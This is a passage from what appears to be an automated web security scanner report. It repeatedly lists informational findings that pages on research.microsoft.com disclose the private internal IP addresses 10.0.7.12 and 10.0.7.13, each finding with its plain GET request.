Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/people/lilich/

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.13

Request

Response

22.154. http://research.microsoft.com/en-us/people/lilich/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/people/lilich/default.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.13

Request

GET /en-us/people/lilich/default.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.155. http://research.microsoft.com/en-us/people/lintaoz/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/people/lintaoz/default.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.13

Request

GET /en-us/people/lintaoz/default.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.156. http://research.microsoft.com/en-us/people/liuj/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/people/liuj/default.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.12

Request

GET /en-us/people/liuj/default.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.157. http://research.microsoft.com/en-us/people/lomet/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/people/lomet/default.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.13

Request

GET /en-us/people/lomet/default.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.158. http://research.microsoft.com/en-us/people/luca/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/people/luca/default.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.13

Request

GET /en-us/people/luca/default.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.159. http://research.microsoft.com/en-us/people/malvar/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/people/malvar/

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.12

Request

GET /en-us/people/malvar/ HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.160. http://research.microsoft.com/en-us/people/malvar/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/people/malvar/default.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.12

Request

GET /en-us/people/malvar/default.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.161. http://research.microsoft.com/en-us/people/manuelc/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/people/manuelc/default.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.13

Request

GET /en-us/people/manuelc/default.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.162. http://research.microsoft.com/en-us/people/marycz/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/people/marycz/default.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.13

Request

GET /en-us/people/marycz/default.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.163. http://research.microsoft.com/en-us/people/mds/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/people/mds/

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.12

Request

GET /en-us/people/mds/ HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.164. http://research.microsoft.com/en-us/people/mds/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/people/mds/default.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.12

Request

GET /en-us/people/mds/default.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.165. http://research.microsoft.com/en-us/people/milanv/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/people/milanv/

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.12

Request

GET /en-us/people/milanv/ HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.166. http://research.microsoft.com/en-us/people/milanv/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/people/milanv/default.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.13

Request

GET /en-us/people/milanv/default.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.167. http://research.microsoft.com/en-us/people/mzh/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/people/mzh/

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.13

Request

GET /en-us/people/mzh/ HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.168. http://research.microsoft.com/en-us/people/najork/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/people/najork/default.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.13

Request

GET /en-us/people/najork/default.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.169. http://research.microsoft.com/en-us/people/pachou/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/people/pachou/default.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.12

Request

GET /en-us/people/pachou/default.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.170. http://research.microsoft.com/en-us/people/padmanab/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/people/padmanab/default.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.13

Request

GET /en-us/people/padmanab/default.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.171. http://research.microsoft.com/en-us/people/palarson/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/people/palarson/default.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.12

Request

GET /en-us/people/palarson/default.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.172. http://research.microsoft.com/en-us/people/parno/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/people/parno/

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.13

Request

GET /en-us/people/parno/ HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.173. http://research.microsoft.com/en-us/people/philbe/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/people/philbe/

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.13

Request

GET /en-us/people/philbe/ HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.174. http://research.microsoft.com/en-us/people/philbe/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/people/philbe/default.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.13

Request

GET /en-us/people/philbe/default.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.175. http://research.microsoft.com/en-us/people/ramjee/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/people/ramjee/

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.12

Request

GET /en-us/people/ramjee/ HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.176. http://research.microsoft.com/en-us/people/ranveer/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/people/ranveer/default.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.13

Request

GET /en-us/people/ranveer/default.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.177. http://research.microsoft.com/en-us/people/rashid/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/people/rashid/default.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.13

Request

GET /en-us/people/rashid/default.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.178. http://research.microsoft.com/en-us/people/richdr/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/people/richdr/default.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.13

Request

GET /en-us/people/richdr/default.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.179. http://research.microsoft.com/en-us/people/robertson/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/people/robertson/default.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.13

Request

GET /en-us/people/robertson/default.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.180. http://research.microsoft.com/en-us/people/roylevin/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/people/roylevin/

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.13

Request

GET /en-us/people/roylevin/ HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.181. http://research.microsoft.com/en-us/people/sdumais/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/people/sdumais/default.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.13

Request

GET /en-us/people/sdumais/default.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.182. http://research.microsoft.com/en-us/people/shuvendu/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/people/shuvendu/default.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.12

Request

GET /en-us/people/shuvendu/default.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.183. http://research.microsoft.com/en-us/people/simonpj/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/people/simonpj/

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.12

Request

GET /en-us/people/simonpj/ HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.184. http://research.microsoft.com/en-us/people/simonpj/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/people/simonpj/default.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.13

Request

GET /en-us/people/simonpj/default.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.185. http://research.microsoft.com/en-us/people/spli/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/people/spli/

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.13

Request

GET /en-us/people/spli/ HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.186. http://research.microsoft.com/en-us/people/surajitc/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/people/surajitc/

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.13

Request

GET /en-us/people/surajitc/ HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.187. http://research.microsoft.com/en-us/people/surajitc/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/people/surajitc/default.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.13

Request

GET /en-us/people/surajitc/default.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.188. http://research.microsoft.com/en-us/people/terry/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/people/terry/default.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.12

Request

GET /en-us/people/terry/default.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.189. http://research.microsoft.com/en-us/people/thekkath/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/people/thekkath/default.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.13

Request

GET /en-us/people/thekkath/default.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.190. http://research.microsoft.com/en-us/people/thoare/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/people/thoare/

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.13

Request

GET /en-us/people/thoare/ HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.191. http://research.microsoft.com/en-us/people/thoare/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/people/thoare/default.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.12

Request

GET /en-us/people/thoare/default.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.192. http://research.microsoft.com/en-us/people/tonyhey/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/people/tonyhey/default.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.13

Request

GET /en-us/people/tonyhey/default.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.193. http://research.microsoft.com/en-us/people/tsharp/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/people/tsharp/

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.13

Request

GET /en-us/people/tsharp/ HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.194. http://research.microsoft.com/en-us/people/wenwuzhu/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/people/wenwuzhu/default.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.13

Request

GET /en-us/people/wenwuzhu/default.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.195. http://research.microsoft.com/en-us/people/wobber/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/people/wobber/default.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.13

Request

GET /en-us/people/wobber/default.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.196. http://research.microsoft.com/en-us/people/wong/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/people/wong/default.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.12

Request

GET /en-us/people/wong/default.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.197. http://research.microsoft.com/en-us/people/wyma/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/people/wyma/

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.13

Request

GET /en-us/people/wyma/ HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.198. http://research.microsoft.com/en-us/people/zhao/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/people/zhao/default.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.12

Request

GET /en-us/people/zhao/default.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.199. http://research.microsoft.com/en-us/press/ablake.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/press/ablake.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.12

Request

GET /en-us/press/ablake.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.200. http://research.microsoft.com/en-us/press/anandan.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/press/anandan.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.12

Request

GET /en-us/press/anandan.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.201. http://research.microsoft.com/en-us/press/bainguo.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/press/bainguo.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.12

Request

GET /en-us/press/bainguo.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.202. http://research.microsoft.com/en-us/press/borgs.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/press/borgs.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.12

Request

GET /en-us/press/borgs.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.203. http://research.microsoft.com/en-us/press/cmbishop.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/press/cmbishop.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.12

Request

GET /en-us/press/cmbishop.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.204. http://research.microsoft.com/en-us/press/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/press/default.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.12

Request

GET /en-us/press/default.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.205. http://research.microsoft.com/en-us/press/fastfacts.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/press/fastfacts.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.12

Request

GET /en-us/press/fastfacts.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.206. http://research.microsoft.com/en-us/press/hon.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/press/hon.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.12

Request

GET /en-us/press/hon.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.207. http://research.microsoft.com/en-us/press/jchayes.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/press/jchayes.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.12

Request

GET /en-us/press/jchayes.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.208. http://research.microsoft.com/en-us/press/kevinsch.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/press/kevinsch.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.12

Request

GET /en-us/press/kevinsch.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.209. http://research.microsoft.com/en-us/press/kwood.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/press/kwood.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.12

Request

GET /en-us/press/kwood.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.210. http://research.microsoft.com/en-us/press/malvar.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/press/malvar.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.12

Request

GET /en-us/press/malvar.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.211. http://research.microsoft.com/en-us/press/mds.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/press/mds.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.12

Request

GET /en-us/press/mds.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.212. http://research.microsoft.com/en-us/press/overview.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/press/overview.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.12

Request

GET /en-us/press/overview.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.213. http://research.microsoft.com/en-us/press/rajamani.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/press/rajamani.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.12

Request

GET /en-us/press/rajamani.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.214. http://research.microsoft.com/en-us/press/roylevin.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/press/roylevin.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.12

Request

GET /en-us/press/roylevin.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.215. http://research.microsoft.com/en-us/press/telabbady.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/press/telabbady.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.12

Request

GET /en-us/press/telabbady.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.216. http://research.microsoft.com/en-us/projects/chem4word/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/projects/chem4word/default.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.12

Request

GET /en-us/projects/chem4word/default.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.217. http://research.microsoft.com/en-us/projects/creativecommons/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/projects/creativecommons/default.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.12

Request

GET /en-us/projects/creativecommons/default.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

